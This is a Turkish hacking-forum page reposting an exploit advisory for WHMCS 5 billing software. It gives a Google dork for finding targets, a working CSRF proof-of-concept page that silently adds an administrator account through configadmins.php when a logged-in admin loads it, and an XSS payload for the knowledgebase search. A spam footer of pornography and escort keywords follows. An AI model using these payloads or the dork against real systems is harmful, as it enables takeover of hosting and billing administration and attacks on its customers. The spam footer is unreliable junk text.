KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
whmcs-5-multiple-csrf-add-admin-xss-vulnerability
Konu : whmcs-5-multiple-csrf-add-admin-xss-vulnerability - 03.02.2015, 14:40
Mesaj: #1
Title: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability
# Version: Latest version 5.1 and other previous version maybe vulnerable 
# Vendor: http://www.whmcs.com
# Date: 2012-05-30
# Tested on: win/linux
# Author/Found by: Shadman Tanjim
# Email: [email protected]
# Greetz: Sayem Islam, Shahee Mirza, JingoBD, ManInDark, Rohit And All Crew and Members of Bangladesh Cyber Army.
# Special Thanks: x8631p 
# Google Dork: "Powered by WHMCompleteSolution" or inurl:WHMCS 
############################################################################################################################

CSRF Vulnerability:

Get:
http://site.com/clientarea.php 
http://site.com/admin/index.php 
http://site.com/admin/login.php 

Post:
http://site.com/admin/login.php
http://site.com/cart.php
http://site.com/admin/configadmins.php
http://site.com/pwreset.php


p0c:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<h2>WHMCS CSRF ExpL0iT PoC</h2>
</head>
<script language="javascript" type="text/javascript" >

function lifeissimple() {

var token = "Token Value";

var img = document.createElement("img");
var site="http://www.localhost.com:80";
var requesturl = site + "/billing/admin/configadmins.php?action=save&id=&token=" + token + "&roleid=1&firstname=dead&lastname=cow&[email protected]&username=deadcow&password=deadcow&password2=deadcow&deptids[]=4&deptids[]=1&signature=deadcow&notes=deadcow&template=blend&language=English";
img.setAttribute("src", requesturl);
document.body.appendChild(img);

var img2 = document.createElement("img");
img2.setAttribute("src", site+"/billing/admin/configadmins.php?added=true&");
document.body.appendChild(img);
}

</script>
<body onload="lifeissimple();">

</body>
</html>


Cross-site Scripting (XSS) Vulnerability: 

requestPOST http://site.com/knowledgebase.php?action=search HTTP/1.1
Content-Type: application/x-www-form-urlencoded

search='%20onerror%3D'f(PSRyh)

WWW Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno